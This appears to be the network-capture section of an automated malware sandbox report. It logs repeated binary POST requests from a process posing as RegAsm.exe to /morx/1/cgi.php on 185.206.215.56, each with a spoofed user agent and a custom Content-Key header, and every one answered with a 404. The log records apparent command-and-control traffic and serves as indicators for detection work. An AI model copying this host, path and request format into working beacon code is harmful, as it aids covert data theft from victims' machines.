                                                                                        18192.168.2.2249185185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:14.391398907 CET1165OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:14.558085918 CET1166INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:13 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
180 | 192.168.2.22 | 49347 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
181 | 192.168.2.22 | 49348 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
182 | 192.168.2.22 | 49349 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
183 | 192.168.2.22 | 49350 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
184 | 192.168.2.22 | 49351 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
185 | 192.168.2.22 | 49352 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
186 | 192.168.2.22 | 49353 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
187 | 192.168.2.22 | 49354 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
188 | 192.168.2.22 | 49355 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
189 | 192.168.2.22 | 49356 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.22 | 49186 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:14.788464069 CET | 1166 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:14.954180002 CET | 1167 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:14 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
190 | 192.168.2.22 | 49357 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
191 | 192.168.2.22 | 49358 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
192 | 192.168.2.22 | 49359 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:08.163208961 CET | 1144 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 176
    Connection: close
Jan 5, 2021 19:06:08.331588984 CET | 1145 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:07 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 15
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.22 | 49187 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:15.165872097 CET | 1168 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:15.352806091 CET | 1168 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:14 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.22 | 49188 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:15.552401066 CET | 1169 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:15.734059095 CET | 1170 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:14 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.22 | 49189 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:15.960354090 CET | 1170 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:16.139384985 CET | 1171 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:15 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.22 | 49190 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:16.358508110 CET | 1172 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:16.531882048 CET | 1172 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:15 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.22 | 49191 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:16.795878887 CET | 1173 | OUT | POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 149
    Connection: close
Jan 5, 2021 19:06:16.967212915 CET | 1174 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 05 Jan 2021 18:06:16 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.22 | 49192 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:17.183871031 CET | 1174 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:17.344388008 CET | 1175 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:16 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.22 | 49193 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:17.566776991 CET | 1176 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:17.726876020 CET | 1176 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:16 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.22 | 49194 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:17.949146032 CET | 1177 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:18.134409904 CET | 1178 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:17 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.22 | 49195 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:18.364453077 CET | 1178 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:18.531193972 CET | 1179 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:17 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.22 | 49196 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:18.788238049 CET | 1180 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:18.959882975 CET | 1180 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:18 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49170 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:08.473301888 CET | 1145 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:08.645122051 CET | 1146 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:07 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.22 | 49197 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:19.176156998 CET | 1181 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:19.341244936 CET | 1182 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:18 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.22 | 49198 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:19.576040030 CET | 1182 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:19.751715899 CET | 1183 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:18 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.2.22 | 49199 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:19.958724022 CET | 1184 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:20.125689983 CET | 1184 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:19 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.2.22 | 49200 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:20.390921116 CET | 1185 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:20.569029093 CET | 1186 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:19 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.2.22 | 49201 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:20.950520992 CET | 1186 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:21.111865044 CET | 1187 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:20 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.2.22 | 49202 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 19:06:21.679579973 CET | 1188 | OUT | POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
Jan 5, 2021 19:06:21.837781906 CET | 1188 | IN | HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:20 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 36 | Source IP: 192.168.2.22 | Source Port: 49203 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:22.303822041 CET | kBytes transferred: 1189 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:22.484252930 CET | kBytes transferred: 1190 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:21 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 37 | Source IP: 192.168.2.22 | Source Port: 49204 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:22.694391966 CET | kBytes transferred: 1190 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:22.877247095 CET | kBytes transferred: 1191 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:21 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 38 | Source IP: 192.168.2.22 | Source Port: 49205 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:23.094146967 CET | kBytes transferred: 1192 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:23.267446041 CET | kBytes transferred: 1192 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:22 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 39 | Source IP: 192.168.2.22 | Source Port: 49206 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:23.470458031 CET | kBytes transferred: 1193 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:23.640826941 CET | kBytes transferred: 1194 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:22 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 4 | Source IP: 192.168.2.22 | Source Port: 49171 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:08.887025118 CET | kBytes transferred: 1147 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:09.065680027 CET | kBytes transferred: 1147 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:08 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 40 | Source IP: 192.168.2.22 | Source Port: 49207 | Destination IP: 185.206.215.56 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\RegAsm.exe

Timestamp: Jan 5, 2021 19:06:23.862730026 CET | kBytes transferred: 1194 | Direction: OUT
Data:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close

Timestamp: Jan 5, 2021 19:06:24.026554108 CET | kBytes transferred: 1195 | Direction: IN
Data:
HTTP/1.0 404 Not Found
Date: Tue, 05 Jan 2021 18:06:23 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
